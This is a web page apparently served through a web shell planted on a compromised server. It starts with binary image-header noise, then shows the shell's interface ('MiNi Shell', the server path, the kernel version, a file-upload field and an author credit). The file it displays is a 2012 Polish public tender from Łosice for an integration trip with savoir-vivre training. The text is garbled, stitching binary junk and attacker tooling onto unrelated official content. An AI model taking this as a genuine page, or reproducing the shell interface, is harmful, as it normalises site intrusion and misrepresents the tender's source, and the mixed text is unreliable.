JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121115/452682-N-2012.html

<p class="kh_header"><b>Łosice: Zorganizowanie wyjazdu integracyjnego - szkoleniowego połączonego ze szkoleniem z zakresu savoir-vivre dla 33 BO oraz ich 5 opiekunów w ramach projektu Szansa Na Lepsze Jutro w Powiecie Łosickim realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Łosicach, współfinansowanego ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 452682 - 2012; data zamieszczenia: 15.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Łosicach , ul. Narutowicza 6, 08-200 Łosice, woj. mazowieckie, tel. 0-83 359 05 51, faks 0-83 359 08 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcprlosice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pcprlosice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie wyjazdu integracyjnego - szkoleniowego połączonego ze szkoleniem z zakresu savoir-vivre dla 33 BO oraz ich 5 opiekunów w ramach projektu Szansa Na Lepsze Jutro w Powiecie Łosickim realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Łosicach, współfinansowanego ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie wyjazdu integracyjno - szkoleniowego połączonego ze szkoleniem z zakresu savoir-vivre dla 33 BO oraz ich 5 opiekunów w ramach projektu Szansa Na Lepsze Jutro w Powiecie Łosickim realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Łosicach, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
1.Usługa w szczególności obejmuje: zakwaterowanie, wyżywienie, zorganizowanie uczestnikom czasu wolnego, dojazd uczestników z Łosic do miejsca przeznaczenia i z miejsca przeznaczenia do Łosic wraz z całodobową opieką opiekuna grupy, przeprowadzenie szkolenia savoir-vivre oraz ubezpieczenia 5 opiekunów na okres trwania wyjazdu.
2.Miejsce wyjazdu integracyjnego: Miejscowość oddalona maksymalnie o 300 km od Łosic.
3.Miejsce szkolenia: w miejscu wyjazdu, /hotel/pensjonat itp. z salą szkoleniową - dostosowany do potrzeb osób niepełnosprawnych ruchowo/
4.Liczba godzin szkolenia: 15 godz. lekcyjnych,
5.Czas trwania wyjazdu: 3 dni /piątek, sobota, niedziela/
6.Termin realizacji zamówienia: do 17 grudnia 2012,
7.Warunki organizacji wyjazdu: wyjazd z Łosic w piątek nie wcześniej jak o godz. 14: 00, powrót w niedzielę do godziny 20:00,
8.Wyjazd nastąpi w piątek z Łosic /parking przy Powiatowym Centrum Pomocy Rodzinie, ul. Narutowicza 6/ do miejsca przeznaczenia. Powrót w niedzielę z miejsca pobytu do Łosic /parking przy Powiatowym Centrum Pomocy Rodzinie, ul. Narutowicza 6/ po wykwaterowaniu,
9.Autokar lub bus, którym będą podróżować uczestnicy wyjazdu winien być sprawny technicznie, posiadać ubezpieczenie OC, NNW oraz aktualne badania techniczne,
10.Liczba uczestników: 33 uczestników projektu + 5 opiekunów.
11.Wyżywienie: dzień przyjazdu /piątek uroczysta kolacja powitalna, sobota pełne wyżywienie /śniadanie, obiad, kolacja/, niedziela - śniadanie, obiad. Catering podczas sesji szkoleniowych /kawa, herbata, ciastka, zimne napoje, soki/, w przypadku miejscowości oddalonej od Łosic pow. 100 km zapewnienie suchego prowiantu na drogę w obie strony.
12.Program zajęć:
-Wstęp - 1 godz.
-Etykieta, na co dzień /procedencja, tytułowanie, przechodzenie na Ty, nawiązywanie kontaktów, wręczanie wizytówek, kultura słowa/ - 4 godz.
-Ubiór - Savoir-vivre w garderobie /ubiór kobiety, ubiór mężczyzny, perfumy, makijaż itp./ - 4 -godz.
-Stół - Kultura przygotowywania i spożywania posiłków - 5 godz.
-Elementy protokołu - 1 godz.
13.Dokumenty potwierdzające zakończenie kursu, jakie Wykonawca zobowiązuje się dostarczyć do Zamawiającego po zakończeniu kursu:
-oryginału list obecności,
-dziennik zajęć szkolenia,
-listy odbioru materiałów szkoleniowych, wyżywienia i cateringu, noclegów oraz list odbioru zaświadczeń o ukończeniu kursu,
-rejestru wydanych zaświadczeń o ukończeniu kursu,
-kserokopii zaświadczeń o ukończeniu kursu,
-faktury za realizację całego zamówienia,
14.Miejscem przeprowadzenia szkolenia powinien być lokal, wyposażony w salę szkoleniową spełniającą wymogi bhp i dostosowaną do ilości grupy oraz posiadającą zaplecze sanitarne /WC, umywalka/. Sala powinna być wyposażona w sprzęt dydaktyczny: tablicę do pisania lub flipchart, rzutnik multimedialny, dostosowane do potrzeb osób niepełnosprawnych ruchowo.
15.Ośrodek powinien posiadać liczbę miejsc noclegowych dostosowaną do grupy wskazanej w SIWZ znajdujące się w jednym budynku oraz stołówkę, dostosowany do potrzeb osób niepełnosprawnych ruchowo.
16.Wykonawca zapewni:
-dojazd w obie strony,
-noclegi w pokojach 2-osobowych oraz 3-osobowy z odrębnymi łóżkami wyposażonych w TV oraz pełny węzeł sanitarny /umywalkę, prysznic, wc/,
-pełne wyżywienie według opisy w rozdziale III, pkt. 10 SIWZ,
-przeprowadzenie 15 godz. lekcyjnych szkolenia z savoir-vive dla grupy 33 osób,
-każdemu uczestnikowi materiały szkoleniowe na własność: notatnik, długopis, teczkę z gumką formatu A4 oraz podręcznik o tematyce savior - vivre,
-odpowiednio przygotowaną kadrę szkoleniową oraz opiekuna grupy,
-opiekuna grupy obecnego podczas całego wyjazdu, 
-uczestnikom wyjazdu bez dodatkowych opłat obsługę kulturalno - oświatową, zajęcia o charakterze integracyjno - rozrywkowym /wyjście do teatru, uroczysta kolacja/
-opłatę taksy klimatycznej za wszystkich uczestników, jeśli wymagać będzie tego lokalizacja ośrodka w miejscowości uzdrowiskowej.
-ubezpieczenie 5 opiekunów
17.Zamawiający zastrzega sobie prawo do zmiany liczby uczestników poszczególnych szkoleń w sytuacjach niezależnych od Zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy. O zaistniałej sytuacji Zamawiający pisemnie zawiadomi niezwłocznie Wykonawcę.
18.Rozliczenie według terminu płatności nastąpi przelewem na rachunek bankowy Wykonawcy zgodnie z projektem umowy po dołączeniu kompletu dokumentów zgodnie z § 4 pkt. 11 wzoru umowy. Do faktury Zamawiający zobowiązany jest dołączyć następujące dokumenty oznaczone zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach PO KL oryginały imiennych list obecności, potwierdzonych własnoręcznym podpisem uczestników szkoleń, terminy realizacji zajęć i ilości godzin, harmonogramy, dziennik zajęć, kserokopie zaświadczeń o ukończeniu kursu, list odbioru wymienionych w rozdziale III, pkt. 10 SIWZ.
19.Zapłata nastąpi po zakończeniu realizacji całego zamówienia w kwocie wskazanej w umowie w terminie 30 dni od dnia rozliczenia się z Zamawiającym.
20.Wykonawca ponosi pełnią odpowiedzialność za właściwą realizację usługi związanej z przebiegiem kursów.
21.Wykonawca zobowiązany jest przedłożyć program kursu na druku stanowiącym zał. Nr 6 do Formularza Ofertowego. Plan nauczania zamieszczony w Programie szkolenia powinien być sporządzony w oparciu o zaproponowany przez Zamawiającego zakres szkolenia. Należy przedstawić szczegółowe zagadnienia, jakie będą zawierać poszczególne zakresy szkolenia. Dopuszcza się modyfikacje planu nauczania, jeżeli chodzi o kolejność poszczególnych zagadnień i ewentualne dodanie pewnych elementów.
22.Wykonawca jest zobowiązany:
-prowadzić ewidencję obecności uczestników szkolenia i zobowiązany jest do informowania zamawiającego o powtarzających się nieobecnościach każdego z uczestników w przypadku przekroczenia 10% nieobecności. 
-do ologowania materiałów szkoleniowych i oznaczenia miejsca szkolenia logo Programu Operacyjnego Kapitał Ludzki i nazwą projektu Szansa Na Lepsze Jutro w Powiecie Łosickim oraz logo Unii Europejskiej i Europejskiego Funduszu Społecznego.
-do prowadzenia dziennika zajęć.
-do przygotowania list odbioru materiałów szkoleniowych, list obecności, list odbioru zaświadczenia o ukończeniu kursu oraz list odbioru cateringu i noclegu.
23.Po zakończeniu kursu Wykonawca przeprowadzi ankietę oceniającą kurs i wyda zaświadczenie lub inny dokument potwierdzający ukończenie kursu. W związku z realizacją kursu w ramach projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego należy wydać zaświadczenie z logo Unii Europejskiej i logo Programu Operacyjnego Kapitał Ludzki lub inny dokument z logo Unii Europejskiej i logo Programu Operacyjnego Kapitał Ludzki i informacją o współfinansowaniu projektu.  
24.Ubezpieczenie uczestników projektu biorących udział w wyjeździe leży po stronie Zamawiającego, natomiast ubezpieczenie 5 opiekunów zapewni Wykonawca.
25.Wykonawca zobowiązuje się do oznakowania miejsca, w którym odbywać się będzie kurs poprzez umieszczenie informacji dotyczących współfinansowania szkolenia przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
26.Zamawiający w przypadku braku środków na zrealizowanie usługi dopuszcza możliwość unieważnienia przetargu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 55.24.00.00-4, 92.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona spełnienia tego warunku na podstawie dokumentu potwierdzającego uprawnienia do wykonywania określonej działalności. Zgodnie z treścią art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia i instytucjach rynku pracy /Dz. U. z 2008 r. Nr 69 poz. 415 z późn. zm./ Wykonawca musi posiadać wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona sprawdzenia oceny spełnienia tego warunku na podstawie dokumentów potwierdzających, że Wykonawca w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje, co najmniej trzy usługi podobne, polegające na organizacji wyjazdu integracyjno-szkoleniowego dla grupy nie mniejszej niż 15 osób, ze wskazaniem odbiorcy, wartości usługi oraz daty i miejsca jej realizacji. Załącznik nr 4</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona sprawdzenia oceny spełnienia tego warunku na podstawie dokumentów potwierdzających, że Wykonawca zapewni zespół umożliwiający zrealizowanie przedmiotu zamówienia w wyszczególnionym zakresie o określonych poniżej kwalifikacjach i doświadczeniu, w skład, którego wchodzą: a) opiekun - 1 osoba, posiadająca ukończone 18 lat.
b) trener prowadzący szkolenie - 1 osoba spełniająca wymagania do prowadzenia szkolenia tj. posiadająca wykształcenie wyższe magisterskie oraz minimum 3-letnie doświadczenie jako trener.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona sprawdzenia oceny spełnienia tego warunku na podstawie dokumentów potwierdzających, że Wykonawca zapewni zespół umożliwiający zrealizowanie przedmiotu zamówienia w wyszczególnionym zakresie o określonych poniżej kwalifikacjach i doświadczeniu, w skład, którego wchodzą: a) opiekun - 1 osoba, posiadająca ukończone 18 lat.
b) trener prowadzący szkolenie - 1 osoba spełniająca wymagania do prowadzenia szkolenia tj. posiadająca wykształcenie wyższe magisterskie oraz minimum 3-letnie doświadczenie jako trener.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona sprawdzenia oceny spełnienia tego warunku na podstawie dokumentów potwierdzających, że Wykonawca posiada ubezpieczenie OC w zakresie prowadzonej działalności gospodarczej, obejmujące przedmiot zamówienia, na kwotę nie mniejszą niż 30 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załączniki od 1 do 10 z SIWZ
b)	Pełnomocnictwo zgodne z obowiązującymi przepisami prawa, wystawione dla osoby (osób) upoważnionych do reprezentowania oferenta w toku postępowania o udzielenie zamówienia publicznego, o ile nie wynika ono z przedstawionych dokumentów- oryginał lub kopia potwierdzona notarialnie za zgodność z oryginałem.
c)	W przypadku, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie Wykonawcy w prowadzeniu tego typu usług - 20</li>
<li>3 - Liczba referencji dotyczących przeprowadzonych usług w danej tematyce - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.losice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
ul. Narutowicza 6, 08-200 Łosice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2012 godzina 08:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
ul. Narutowicza 6, 08-200 Łosice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com